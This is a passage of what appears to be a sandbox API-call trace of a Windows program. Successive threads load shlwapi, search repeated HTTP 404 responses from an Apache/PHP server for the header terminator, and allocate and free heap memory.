| out: hHeap=0x620000) returned 1 [0268.498] GetProcessHeap () returned 0x620000 [0268.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 114 os_tid = 0xc2c [0270.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0270.396] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:53 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0270.397] GetProcessHeap () returned 0x620000 [0270.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0270.397] GetProcessHeap () returned 0x620000 [0270.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0270.397] GetProcessHeap () returned 0x620000 [0270.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 115 os_tid = 0xc34 [0272.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0272.049] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:54 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0272.049] GetProcessHeap () returned 0x620000 [0272.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0272.050] GetProcessHeap () returned 0x620000 [0272.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0272.050] GetProcessHeap () returned 0x620000 [0272.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 116 os_tid = 0xc38 [0273.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0273.467] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:56 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0273.467] GetProcessHeap () returned 0x620000 [0273.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0273.467] GetProcessHeap () returned 0x620000 [0273.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0273.467] GetProcessHeap () returned 0x620000 [0273.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 117 os_tid = 0xc3c [0275.473] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0275.473] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:58 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0275.473] GetProcessHeap () returned 0x620000 [0275.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0275.473] GetProcessHeap () returned 0x620000 [0275.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0275.473] GetProcessHeap () returned 0x620000 [0275.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 118 os_tid = 0xc40 [0277.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0277.458] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:30:00 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0277.459] GetProcessHeap () returned 0x620000 [0277.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0277.459] GetProcessHeap () returned 0x620000 [0277.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0277.459] GetProcessHeap () returned 0x620000 [0277.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 119 os_tid = 0xc44 [0279.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0279.452] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:30:02 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0279.452] GetProcessHeap () returned 0x620000 [0279.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0279.452] GetProcessHeap () returned 0x620000 [0279.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0279.452] GetProcessHeap () returned 0x620000 [0279.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 120 os_tid = 0xc48 [0281.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0281.408] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:30:03 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0281.408] GetProcessHeap () returned 0x620000 [0281.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0281.408] GetProcessHeap () returned 0x620000 [0281.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0281.409] GetProcessHeap () returned 0x620000 [0281.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 121 os_tid = 0xc90 [0283.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0283.173] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:30:05 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0283.173] GetProcessHeap () returned 0x620000 [0283.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0283.173] GetProcessHeap () returned 0x620000 [0283.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0283.173] GetProcessHeap () returned 0x620000 [0283.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 122 os_tid = 0xc94 [0285.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0285.270] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:30:07 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.270] GetProcessHeap () returned 0x620000 [0285.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0285.270] GetProcessHeap () returned 0x620000 [0285.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0285.271] GetProcessHeap () returned 0x620000 [0285.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 123 os_tid = 0xc98 [0287.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0287.088] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:30:09 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0287.088] GetProcessHeap () returned 0x620000 [0287.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0287.122] GetProcessHeap () returned 0x620000 [0287.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0287.122] GetProcessHeap () returned 0x620000 [0287.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 124 os_tid = 0xc9c [0288.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0288.803] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:30:11 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0288.803] GetProcessHeap () returned 0x620000 [0288.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0288.803] GetProcessHeap () returned 0x620000 [0288.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0288.803] GetProcessHeap () returned 0x620000 [0288.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 125 os_tid = 0xca0 [0290.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0290.575] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:30:13 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0290.575] GetProcessHeap () returned 0x620000 [0290.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0290.575] GetProcessHeap () returned 0x620000 [0290.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0290.575] GetProcessHeap () returned 0x620000 [0290.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 126 os_tid = 0x1060 [0292.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0292.782] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:30:15 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0292.782] GetProcessHeap () returned 0x620000 [0292.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0292.782] GetProcessHeap () returned 0x620000 [0292.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0292.782] GetProcessHeap () returned 0x620000 [0292.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1